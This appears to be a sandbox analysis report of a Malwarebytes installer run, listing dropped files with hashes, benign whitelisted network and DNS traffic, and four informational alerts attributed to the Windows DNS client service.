File: C:\Windows\SysWOW64\drivers\mbamtestfile.dat
Type: text
MD5: 9F06243ABCB89C70E0C331C61D871FA7
SHA256: 837CCB607E312B170FAC7383D7CCFD61FA5072793F19A25E75FBACB56539B86B

PID 664, MBAMInstallerService.exe
File: C:\Windows\Temp\MBInstallTemp6efa4167209d11f089182420b137d17f\servicepkg.7z
Type: compressed
MD5: 7842DAD4BFCDF6E64591A937D81B008D
SHA256: 11AF576D85AC0CF666A1356BE4E75DCE8CD49B1A008F802270725F2F12058519

PID 6808, MBSetup.exe
File: C:\Program Files (x86)\mbamtestfile.dat
Type: text
MD5: 9F06243ABCB89C70E0C331C61D871FA7
SHA256: 837CCB607E312B170FAC7383D7CCFD61FA5072793F19A25E75FBACB56539B86B

PID 664, MBAMInstallerService.exe
File: C:\Windows\Temp\MBInstallTemp6efa4167209d11f089182420b137d17f\7z.dll
Type: executable
MD5: 3430E2544637CEBF8BA1F509ED5A27B1
SHA256: BB01C6FBB29590D6D144A9038C2A7736D6925A6DBD31889538AF033E03E4F5FA

PID 664, MBAMInstallerService.exe
File: C:\Windows\Temp\MBInstallTemp6efa4167209d11f089182420b137d17f\ctlrpkg\Assistant.deps.json
Type: binary
MD5: CC1B068F1AC8C087A411861849A0948A
SHA256: 335038102A92000713369FB753FFEDEDCFAB8C153E7CF24E5B678B5843BC90EA

PID 664, MBAMInstallerService.exe
File: C:\Windows\Temp\MBInstallTemp6efa4167209d11f089182420b137d17f\servicepkg\srvversion.dat
Type: text
MD5: BE80F7D6E767D297EE70C67A875CE7D2
SHA256: 6298849F84EEF383F90BB12CEE58D179901605B77B97A229B0316567D4FF1B7F
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 40
TCP/UDP connections: 112
DNS requests: 162
Threats: 4

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Reputation
- | - | GET | 200 | 23.48.23.166:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | whitelisted
- | - | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | whitelisted
5496 | MoUsoCoreWorker.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | whitelisted
6544 | svchost.exe | GET | 200 | 2.17.190.73:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | whitelisted
2384 | SIHClient.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | whitelisted
2384 | SIHClient.exe | GET | 200 | 184.30.21.171:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | whitelisted
968 | firefox.exe | GET | 200 | 34.107.221.82:80 | http://detectportal.firefox.com/canonical.html | unknown | whitelisted
968 | firefox.exe | GET | 200 | 34.107.221.82:80 | http://detectportal.firefox.com/success.txt?ipv4 | unknown | whitelisted
968 | firefox.exe | POST | 200 | 142.250.186.35:80 | http://o.pki.goog/s/wr3/cgo | unknown | whitelisted
968 | firefox.exe | POST | 200 | 184.24.77.79:80 | http://r11.o.lencr.org/ | unknown | whitelisted

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
- | - | 51.124.78.146:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
4 | System | 192.168.100.255:137 | - | - | - | whitelisted
- | - | 23.48.23.166:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted
- | - | 184.30.21.171:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted
5496 | MoUsoCoreWorker.exe | 184.30.21.171:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted
4 | System | 192.168.100.255:138 | - | - | - | whitelisted
6808 | MBSetup.exe | 54.148.100.197:443 | api2.amplitude.com | AMAZON-02 | US | whitelisted
3216 | svchost.exe | 172.211.123.249:443 | client.wns.windows.com | MICROSOFT-CORP-MSN-AS-BLOCK | FR | whitelisted
6544 | svchost.exe | 20.190.160.132:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted
6544 | svchost.exe | 2.17.190.73:80 | ocsp.digicert.com | AKAMAI-AS | DE | whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.124.78.146
  • 40.127.240.158
whitelisted
crl.microsoft.com
  • 23.48.23.166
  • 23.48.23.147
  • 23.48.23.143
  • 23.48.23.173
whitelisted
www.microsoft.com
  • 184.30.21.171
whitelisted
google.com
  • 142.250.185.110
whitelisted
api2.amplitude.com
  • 54.148.100.197
  • 44.240.131.133
  • 35.167.93.246
  • 52.41.237.253
  • 52.27.195.133
  • 52.13.4.69
  • 52.35.83.209
  • 54.149.217.201
  • 52.39.44.214
  • 35.82.121.129
  • 52.88.252.66
  • 44.230.55.168
  • 54.203.125.164
  • 54.71.192.135
  • 34.216.233.53
  • 54.212.150.180
whitelisted
client.wns.windows.com
  • 172.211.123.249
whitelisted
login.live.com
  • 20.190.160.132
  • 40.126.32.136
  • 40.126.32.140
  • 40.126.32.133
  • 20.190.160.14
  • 40.126.32.68
  • 20.190.160.130
  • 20.190.160.64
whitelisted
ocsp.digicert.com
  • 2.17.190.73
  • 184.30.131.245
whitelisted
slscr.update.microsoft.com
  • 4.175.87.197
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 52.165.164.15
whitelisted

Threats

PID | Process | Class | Message
2196 | svchost.exe | Not Suspicious Traffic | INFO [ANY.RUN] Cloudflare R2 Storage (r2 .cloudflarestorage .com)
2196 | svchost.exe | Not Suspicious Traffic | INFO [ANY.RUN] Cloudflare R2 Storage (r2 .cloudflarestorage .com)
2196 | svchost.exe | Not Suspicious Traffic | INFO [ANY.RUN] Cloudflare R2 Storage (r2 .cloudflarestorage .com)
2196 | svchost.exe | Possible Social Engineering Attempted | ET HUNTING Suspicious Netlify Hosted DNS Request - Possible Phishing Landing

All four alerts are attributed to PID 2196, which the process list identifies as svchost.exe -k NetworkService -p -s Dnscache, the DNS client service that resolves names on behalf of every process on the host. The alert therefore shows that a Netlify-hosted name was looked up, not which process asked for it; the Netlify domain itself does not appear in the DNS request list above.
Debug output

Process | Message
MBAMService.exe | Retry XPE file open (logged 10 times)